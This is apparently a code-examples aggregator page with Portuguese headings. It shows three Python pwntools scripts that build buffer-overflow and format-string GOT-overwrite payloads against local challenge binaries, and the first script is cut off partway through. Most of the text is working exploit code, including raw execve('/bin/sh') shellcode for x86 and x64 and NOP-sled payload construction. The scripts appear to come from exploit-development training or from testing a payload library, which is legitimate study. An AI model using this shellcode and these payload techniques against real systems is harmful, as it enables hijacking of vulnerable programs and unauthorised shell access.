Exemplos de BufferOverflow em Python, exemplos de sf.BufferOverflow em Python

Exemplo n.º 1

0

Exibir arquivo

# +------------------------------------------------+
# | Atack: Format String GOT Shellcode             |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *
import time
import sf

target = process("./Correction-FsGotShellcode-x86")
gdb.attach(target)

bof_payload = sf.BufferOverflow(arch=32)

target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (92)
fs = sf.WriteFmtStr(arch=32,
                    value=-0x36,
                    address=0x804b2d8,
                    offset=0x4,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=ret_address,
                    address_base=0)

payload = sf.BufferOverflow(arch=32, start=92)
payload.add_bytes(92, fs.generate_fmt_str())
payload.add_bytes(
    54,

Exemplo n.º 2

0

Exibir arquivo

from pwn import *
import time
import sys
import signal
import sf

target = process("./Correction-CallInput-x86")
gdb.attach(target, execute="verify_exploit")

bof_payload = sf.BufferOverflow(arch=32)

bof_payload.set_input_start(0x0)
bof_payload.add_bytes(
    0x0,
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
)
bof_payload.set_default_byte(b"\x90")
payload = bof_payload.generate_payload()
target.sendline(payload)

# Exploit Verification starts here 15935728


def handler(signum, frame):
    raise Exception("Timed out")


def check_verification_done():
    while True:
        if os.path.exists("pwned") or os.path.exists("rip"):
            sys.exit(0)

Exemplo n.º 3

0

Exibir arquivo

from pwn import *

import os
import sf
import sys
import signal

target = process("./chall-test_FmtString-20-x64")
gdb.attach(target, execute="verify_exploit")

bof_payload = sf.BufferOverflow(arch=64)

target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvuntil(b"\n").strip(b"\n"), 16)
ret_address = leak + (168)
fs = sf.WriteFmtStr(arch=64,
                    value=-0x50,
                    address=0x4033b8,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=ret_address,
                    address_base=0)

payload = sf.BufferOverflow(arch=64, start=168)
payload.add_bytes(168, fs.generate_fmt_str())
payload.add_bytes(
    80,
    b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
)
target.sendline(payload.generate_payload())